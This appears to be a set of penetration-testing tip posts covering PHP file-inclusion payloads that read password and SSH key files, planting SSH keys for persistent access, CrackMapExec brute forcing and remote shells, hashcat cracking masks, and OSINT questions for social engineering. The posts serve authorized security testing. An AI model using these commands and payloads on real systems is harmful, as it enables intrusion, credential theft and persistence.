Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks

Dropping SSH Keys on Compromised Linux Hosts

Once you have a reverse shell, you may want to consider dropping a SSH key so that you can return at a later time. This guide intends to serve as a quick tutorial on how to do this.


From the Compromised Remote Host:

Navigate to and/or create the following directory.

/home/<user>/.ssh

Change into it, and then run the following command.

ssh-keygen -f id_rsa

This should generate a private key along with a public key. You’ll want to create an “authorized_keys” file by running the following command.

cat id_rsa.pub > authorized_keys

Then you’ll want to take your private key to your local system by running the following command and copying the contents.

cat id_rsa


On Your Local System:

Create a new file by running the following command and pasting the contents of your clipboard.

vi id_rsa

Then make the appropriate file permissions changes.

chmod 600 id_rsa

That’s it! You should now be able to SSH in.

ssh user@targetIP

Tips & Tricks

Quickly Formatting Nmap Output to Comma Separate Open Ports

There are times where you want to run a quick Nmap scan to see what ports are open, and then rerun a more in-depth Nmap scan on those specific ports. Doing it this way will allow you to lessen the amount of time it takes to run the scan, as you aren’t wasting time trying to run Nmap scripts or enumerate version information on ports that aren’t open.

Your initial scan make look something like this.

sudo nmap -p- <target> -oA nmap/quick

You can then run the following to retrieve a command separated list of open ports you can copy/paste to your next command.

cat nmap/quick | grep open | awk -F/ '{print $1}' ORS=','; echo

Tips & Tricks

Getting Shells With CrackMapExec

I love CrackMapExec. Seriously, it’s one of my favorite tools to use for internal Active Directory pentesting. Once you find valid credentials, you can throw it into this tool to pass it around the network and see where else those creds are valid. Let’s say you find a password within a log file, but don’t know what username its for? CrackMapExec will tell you. Let’s say you compromise a machine and dump the SAM database and are curious what other machines the hashes might be valid on? CrackMapExec will tell you.

This post intends to serve as a guide for some additional things that I’ve learned about CrackMapExec, that I want to remember in the future. This is far from a comprehensive list of what the tool can do, but it will be updated over time.


Mass Execution of Commands

Let’s say you’ve captured elevated credentials for a user that is admin on multiple machines across the domain. You can use the -c flag to execute commands.

I made a post that used this feature of CME to mass deploy Covenant launchers. You can check that out at Using CrackMapExec to Install Covenant C2 Launchers.


Brute Forcing

This tool is extremely useful for many use cases, but did you know it can also perform brute force attacks?

Let’s create a user list along with a password list. Then we can just feed it to CME with the following syntax.

crackmapexec smb <target> -u <users.txt> -p <passwords.txt> --continue-on-success

Note: Be careful when doing this, as you will lock out users if there is a password policy in place.


Don’t Sleep on WinRM

Once you’ve found valid credentials, CrackMapExec’s SMB function will only display “Pwn3d” if the user is a local administrator. However, there is another function that you can try instead.

crackmapexec winrm <target> -u <user> -p <password>

If this returns Pwn3d, then you can leverage EvilWinRM to get the shell.

evil-winrm -i <target> -u <username> -p <password>

Tips & Tricks

Changing Active Directory Password Using smbpasswd

If you’re able to get valid user credentials, but you’re unable to login because the password has expired and/or needs to be changed, you can leverage this tool in Kali Linux.

smbpasswd -U <username> -r <domainController>

Note: You can use either the FQDN of the Domain Controller, or it’s IP address.

This tool will prompt you for the current password of the user, along with what password you desire.

Tips & Tricks

Using Hashcat Rules to Create Custom Wordlists

When on an engagement, it is common to need a custom wordlists for either Password Spraying, or Password Cracking when you have captured some hashes. This post intends to serve as a quick guide for leveraging Hashcat rules to help you build effective custom wordlists.


To start, let’s begin with setting the scenario up. In our fictional scenario, we’ll be targeting an Active Directory domain named NBA.local. Let’s begin by creating a handful of words that would be likely for this domain. We’re only going to start with a few words, as our list is going to grow exponentially when we start applying rules to them. In a real engagement, you may want to gather 10-20 words to use.

Here’s the list I started with.

We should also append the current year to the words. There are dozens of ways to do this, but a simple method is to use a for loop.
for i in $(cat list1.txt);do echo $i;echo ${i}2020;echo ${i}2021;done > t

Now we’ll take this list, and feed it through Hashcat’s Best64 rule.
hashcat --force <wordlist> -r /usr/share/hashcat/rules/best64.rule --stdout > hashcat_words.txt

You can see from the screenshot that we turned our list that previously contained 4 words into a list that now contains 308 words! But if you look through the list, you’ll see it doesn’t contain any symbols. To fix this, we can create our own custom rule called append_exclamation.rule that contains the following:

:
$!

Now we can run hashcat again, but this time we’ll specify both rules instead of just the one. Just keep in mind that you may get duplicates, so you may want to also add the sort -u command.

hashcat --force <wordlist> -r append_exclamation.rule -r /usr/share/hashcat/rules/best64.rule --stdout | sort -u > hashcat_words.txt

This time when we check the number of words in the list, we see exactly double what we had before! This is because the list has the same 308 words as last time, but now also has them all with an exclamation added.

One of my favorite commands for creating wordlists:
hashcat --force list.txt -r /usr/share/hashcat/rules/best64.rule -r /usr/share/hashcat/rules/toggles5.rule -r /usr/share/hashcat/rules/append_atsign.rule -r /usr/share/hashcat/rules/append_exclamation.rule --stdout | sort -u > list-uniq.txt


Hashcat Masking Attack

Some of my favorite masking attack commands to run:

hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?s?d?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?s?d?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?s?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?s?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt -1 ?u?l ?1?1?1?s?d?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt -1 ?u?l ?1?1?1?1?s?d?d?d?d

hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?d?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?l?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?d?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?d?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?l?d?d
hashcat -m 1000 -a 3 hashes\users.txt ?u?l?l?l?l?l?l?d
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?1?1?1?d?s
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?l?d?d?d?d
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?d?d?d?d?s
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?d?d?d?d?s
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?l?d?d?d?d?s
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?l?d?d?s?s
hashcat -m 1000 -a 3 -1 ?u?l hashes\users.txt ?1?1?1?1?d?d?d?s

Tips & Tricks

Installing Git Bash for Windows

Git Bash for Windows allows you to leverage Unix commands, such as; ls, cat, grep, find, etc. It also allows you to easily download tools from Github using the Git Clone syntax.


Navigate over to the following URL and download the necessary installer.

https://git-scm.com/download/win

Save the installer, and then Run as Admin.

Then go through the Next, Next, Finish. I like to use the defaults.

Once finished, you can find and run the program.

Tips & Tricks

Excellent OSINT Questions for Social Engineering Engagements

Please note that this list came from Christopher Hadnagy’s book, Social Engineering The Science of Human Hacking.


Questions for a Corporation:
How does the corporation use the internet?
How does the corporation use social media?
Does the corporation have policies in place for what its people can put on the internet?
How many vendors does that corporation have?
What vendors does the corporation use?
How does the corporation accept payments?
How does the corporation issue payments?
Does the corporation have call centers?
Where are HQ, Call Centers, or other branches located?
Does the corporation allow BYOD?
Is the corporation in one location or many?
Is there an org chart available?

Questions for an Individual:
What social media accounts does the person use?
What hobbies does the person have?
Where does the person vacation?
What are the person’s favorite restaurants?
What is the family history (sicknesses, businesses, and so on) of the person?
What is the person’s level of education? What did the person study? Where?
What is the person’s job role, including whether people work from home, for themselves, and who they report to?
Are there any other sites that mention the person (maybe they give speeches, post to forums, or are part of a club)?
Does the person own a house? If yes, what are the property taxes, liens, and so on?
What are the names of the person’s family members (as well as any of the previously mentioned info on those people)?

Tips & Tricks

Listing AD Group Membership of Multiple Users in PowerShell

I recently was on an engagement where I was able to successfully compromise a large list of user accounts. I wanted to leverage PowerShell to quickly see which groups these users are a part of to help me decide who to enumerate first.

I through the users into a text file and this is the PowerShell code I ended up using.

$users = Get-Content -path 'C:\tmp\users.txt'
foreach($user in $users){
write-host "Group Membership for: " $user
Get-ADPrincipalGroupMembership -Identity $user | Select name | ft -hidetableheaders
write-host "______________________________"
}